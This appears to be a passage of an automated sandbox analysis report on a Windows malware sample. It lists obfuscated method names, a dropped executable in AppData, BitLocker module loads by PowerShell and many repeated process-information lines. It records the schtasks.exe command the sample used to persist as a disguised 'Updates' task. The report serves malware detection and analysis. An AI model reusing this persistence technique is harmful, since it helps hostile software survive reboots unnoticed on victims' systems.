                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, W2GbS7ctm56xnVCTTs.csHigh entropy of concatenated method names: 'GAInaIearf', 'GvCnkn37Qo', 'QEjncepLih', 'VRJnP98MoY', 'TdMnStVarj', 'VbLnh0q952', 'gAInHt86pm', 'BntnFCoXsT', 'y9vnMWHyiS', 'bd5nth7yr7'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, WZ8woTCqqfGmwsK6uH.csHigh entropy of concatenated method names: 'P47X8U4RDp', 'CKaXS7Kr8v', 'aiPXhGaDCh', 'uOQXHIr6k5', 'yrPXFn2YQn', 'DouXMe5I5Y', 'KufXtfpK56', 'EeoXZFHL7t', 'zMmX3hfPqk', 'v97Xa4AjQi'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, tHnWHHNaWw3UFRXi5I.csHigh entropy of concatenated method names: 'LoSsDEBJEh', 'EiesWg361V', 'LGysRP8OKi', 'hupsvoYtNe', 'GIssns9gnl', 'q1lsxb5RYA', 'ju7cq9B0fKAPyxioQe', 'yJy7iJjKjdkNWrFh3j', 'FKFssl11lF', 'gXrsKb3XsY'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, v9UB23bcfulLsphOi7.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oEKgC4edmU', 'MLrgAKGZAR', 'qNYgzlDA8Q', 'gZPKwJ2wJN', 'LmGKskTE69', 'F4LKgnMG95', 'qAeKK118Ha', 'UY4fhT5NEUWAOcnf9g0'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, GDVAAOBvhEAucrmXbL.csHigh entropy of concatenated method names: 'ecW1oLHqki', 'TUB1AQiWXT', 'u1vywS5lC8', 'ql1ysgubwl', 'kmx1OYKQrV', 'VYD1ktIlBk', 'JnP1YnK4qF', 'Xpx1cY18qK', 'oNR1Paem4F', 'Bbn1lvgnJd'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, TtlArnWQhEOvx9I77P.csHigh entropy of concatenated method names: 's8eKUf0xQM', 'AY6KfgrT4Y', 'J21Ku5rfAh', 'hQsKbTLHy6', 'lFIK0B9amg', 'qUKK9yXHow', 'k94KDDotJm', 'bXcKWskDxE', 'dZkKIvBcGF', 'bewKRxyoZv'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, z95CQt3ZHDEQED6kMV.csHigh entropy of concatenated method names: 'IRED2PrN54', 'NFqDr7fJ3K', 'kdMD5kCOxr', 'gpMDTkNosC', 'SZ4Dd9MICs', 'T3QD6FwFZj', 'P6PDi25GYV', 'z45DGoOgf2', 'LlDDjrMjKr', 'OJsDJ5tmWm'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, cS5igaL7Ukukna13hg.csHigh entropy of concatenated method names: 'MKUXnZdIQ0', 'HdMX1H8AYh', 'JIcXXdGFLh', 'eJVXptXXPD', 'Vn1X4Y6EZA', 'nAlX7SmjHr', 'Dispose', 'rm9yfL74V3', 'a8ZyuHjIdV', 'X2OybSyxD2'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, oioII1u2iohGVScvCK.csHigh entropy of concatenated method names: 'Dispose', 'PuksCna13h', 'H7egS9T0ic', 'oHCc9frGjM', 'cmWsAembM5', 'i08szgZ6PW', 'ProcessDialogKey', 'mdogwZ8woT', 'wqfgsGmwsK', 'CuHggAIDK8'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, pNHtmZjGyP8OKibupo.csHigh entropy of concatenated method names: 'FwlbTwLV9t', 'xYLb6Tj2db', 'XmobGjbNYL', 'Ek8bjNqewb', 'ODLbnbuM6H', 'uZrbxEdlIp', 'rfvb1Uy1w1', 'XmMbyeeGHZ', 'Nv3bXVVbvE', 'vI8bebD9eO'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, QtNeh2JvwRXJNSIss9.csHigh entropy of concatenated method names: 'G2O0dYdON9', 'jMN0ipQNkb', 'zSIbhCT88B', 'L0BbHbpoPO', 'sltbFBFbd8', 'pMybMu54pS', 'EqIbtCT76E', 'i3LbZTwfi0', 'thWb39l0hA', 'bSkbaHaYUb'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, IvSoATzCiQOIdwUjvL.csHigh entropy of concatenated method names: 'pEXe6nL7TL', 'zEreGDwlTV', 'Sx5ejoghsB', 'hPae8QFrr5', 'ntMeSriIID', 'owKeHB5pyu', 'YnPeFof8sC', 'CRJe7aLqHb', 'pX4e2dDFFU', 'XbOerOHf2b'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, EkCE1YgLaLwc7KBIkN.csHigh entropy of concatenated method names: 'HOj57TWyV', 'aBLTVY1gK', 'OTd6mbc9D', 'xdAiYtug9', 'BrKjQMUYi', 'dPyJPgjlf', 'tAlhQfMRoq0DNutkFA', 'ldK4avLUBusYBWotFt', 'm5jyVOYL7', 'rWKer1BWL'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, nCI8PvtrJldSaZ0bMU.csHigh entropy of concatenated method names: 'LA8Dfri7H5', 'V7FDbTof2X', 'NhhD9p0DnH', 'r2F9AsRjNl', 'Mcc9zTBqdp', 'GlbDwGZpfX', 'DSjDsw5mFl', 'POdDgRT1F9', 'LySDKTnRg8', 'gEsDN8CycI'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, dALCuLlFL8uRisXkOc.csHigh entropy of concatenated method names: 'ToString', 'Il5xOnajhI', 'bJExSFgj9P', 'yeMxhFnnyC', 'UinxHXrrHp', 'Y2nxFQRLVx', 'e25xM1BTA8', 'ljFxtSDyAV', 'R9ixZjsWHc', 'qXvx3lrsJd'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, YIDK8RAQK6sX8UPwYc.csHigh entropy of concatenated method names: 'HYXebgyMAo', 'o5Ve0bJvar', 'dKSe9B4Dpq', 'DjteDj92K3', 'bFceXSWuaj', 'lbBeWPCa8i', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, vTnFiassMKl25nAas6w.csHigh entropy of concatenated method names: 'XhkeAQqVGe', 'Q6deza8v8B', 'CtFpwDw5bi', 'vxFpsOpwam', 'RhTpgq6l94', 'AKkpK1noD4', 'ruXpNmxuns', 'WHbpUJKOY6', 'dnlpfoddJ5', 'qdvpu8hvCh'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, fovaF3EuYxn1vCZo2Q.csHigh entropy of concatenated method names: 'HrA1RJ0oib', 'NVy1vP4EOa', 'ToString', 'Rhx1fgRuf6', 'csO1uxUdo3', 'hjh1bACsK3', 'tTM10xnsVN', 'vN119UL8hY', 'qCR1DV8OAF', 'TgS1WEwOPt'
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeFile created: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
